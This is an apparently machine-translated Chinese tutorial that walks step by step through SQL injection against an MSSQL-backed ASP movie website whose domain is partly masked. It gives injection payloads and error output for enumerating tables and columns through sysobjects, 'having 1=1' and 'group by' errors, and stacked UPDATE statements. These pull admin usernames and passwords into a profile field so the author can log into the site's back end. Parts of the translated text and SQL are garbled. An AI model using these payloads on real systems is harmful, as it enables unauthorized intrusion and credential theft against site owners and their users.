Author of the article: Leaf [EST]
Source: Evil Eight Bao China
Getting of the table name and field name _ applicable:
1) Database is MSSQL
2) Connecting to the database is just a normal user
3) I don't know the ASP source code
Can be attacked
1) Add, view, change the data content
Example:
This document
http://www.dy**.com/user/wantpws.asp
Test attack for columns.
first step:
Enter single quotes at the input user name, display
Microsoft OLE DB Provider for SQL Server Error 80040E1 The string has unacceptable quotes. / user/wantpws.asp, line 63
Explain that there is no filtration single quotation and the database is MSSQL.
Step 2:
Enter a; use master;
display
Microsoft OLE DB Provider for SQL Server Error 80040E21 Multi-step OLE DB operation generates an error. If possible, check each OLE DB status value. No work was completed. /user/wantpws.asp, line 63 This shows that there is no authority.
third step:
Enter: a or name like fff%;
Show with a user named ffff.
the fourth step:
Enter at the user name
FFFF AND 1 <> (Select Count (Email) from "");
display:
Microsoft OLE DB Provider for SQL Server Error 80040E37 Object Name User is invalid. / user/wantpws.asp, line 96
Explain that there is no table that is called User, try to be successful, and there is a column called Email.
(One way of oriental flutches is to input a having 1 = 1--
Generally returning, you can directly get a table name and a field name.
Microsoft OLE DB Provider for SQL Server Error 80040E14 Columns Users.ID is invalid in the selection list because the column is not included in the aggregate function and there is no Group By clause. / user/wantpws.asp, line 63
)
Now we know that the password for the FFFF user is 111111.
By the statement, you can get all the table names and field names in the database.
the fifth step:
enter:
FFF; Update [users] set email = (select top 1 name from sysobjects where xtype = u and status> 0) Where name = fff;
Description:
The above statement is to get the first user table in the database and place the table name in the mailbox field of the FFFF user.
You can get the first table called AD by viewing the user profile of FFFF.
Then get the ID of this table according to the table name AD
FFF; Update [users] set email = (select top 1 id from sysobjects where xtype = u and name = ad) where name = fff;
I don't know the ID is: 581577110
Since the object flag ID is based on the small to large arrangement, we can get the name of all user tables.
You can get the name of the second table like this.
ffff; update [users] set email = (select top 1 name from sysobjects where xtype = u and id> 581577110) where name = ffff; - ad elapsed period of time after the speculation 581577110users 597577167buy 613577224car 629577281learning 645577338log 661577395movie 677577452movieurl 693577509password 709577566type 725577623talk us Get the above analysis, you should understand Password, users are the best
Step 6: Guess the field of important table
enter:
Take a look at what fields in the users table
FFF; Update [users] set email = (select top 1 col_name (Object_ID (users), 3) Where name = fff;
Get the third field is Password
FFF; Update [users] set email = (select top 1 col_name (Object_ID (users), 4) from user name = fff;
Get the fourth field is Name
Finally, the field of the USERS table has been received.
(Note: Another way to get fields, premise is the return of the system
a group by id happy 1 = 1 -
get
Microsoft OLE DB Provider for SQL Server Error 80040E14
Column Users.UserID is invalid in the selection list because the column is neither included in the aggregate function or in the group BY clause.
/ user/wantpws.asp, line 63
This second field is UserID
Show the third field.
a group by id, userid having 1 = 1 -
Microsoft OLE DB Provider for SQL Server Error 80040E14
Columns.password is invalid in the selection list because the column is neither included in the aggregate function or in the group BY clause.
/ user/wantpws.asp, line 63
Get Password
Similarly, all it has always displayed. :)
)
users table 1 2 3 4id userid password name5 6 7 8 9 10 11 12 13 14 15 16Province homeaddress city adress starlook sex email nlook nos date money send17 18 19 20 21 22 23 24 25 26 27 28oklook dnlook lasthits phone askmejoin getmoney payno logintime mflag State Post Note
STARLOOK - 12 10 2003 2:41 PM
NLOOK --- 0
NOS - 2 landing number
Date - 12 10 2003 12:00 AM registration time?
Money -
Send - empty
Oklook - 0
DNLOOK - 0
GetMoney - 0
State - 0
Note - This guy is very. . . Description
Password Table 1 2 3ID Name PWD
Then I tried AD to record the advertising point. .
The Password table is then tried to get the Name and PWD fields.
carried out
FFF; Update [users] set email = (select top 1 name from password) where name = fff; - You can get the first user name is that most of the administrator is administrator. Then I got the password is DY *** DICK188 or the star count, haha ...
In this way, we have entered the background of this movie website. Haha.
http://www.dy**.com/login.asp
Further, it is also possible to know that the administrator can see a total of three passwords.
FFF; Update [users] set email = (select top 1 count (id) from password) where name = fff; - fff; update [users] set email = (Select Top 1 PWD from password where id = 2) Where name = ffff; - fff; Update [users] set email = (select top 1 name from password where id = 2) Where name = fff;
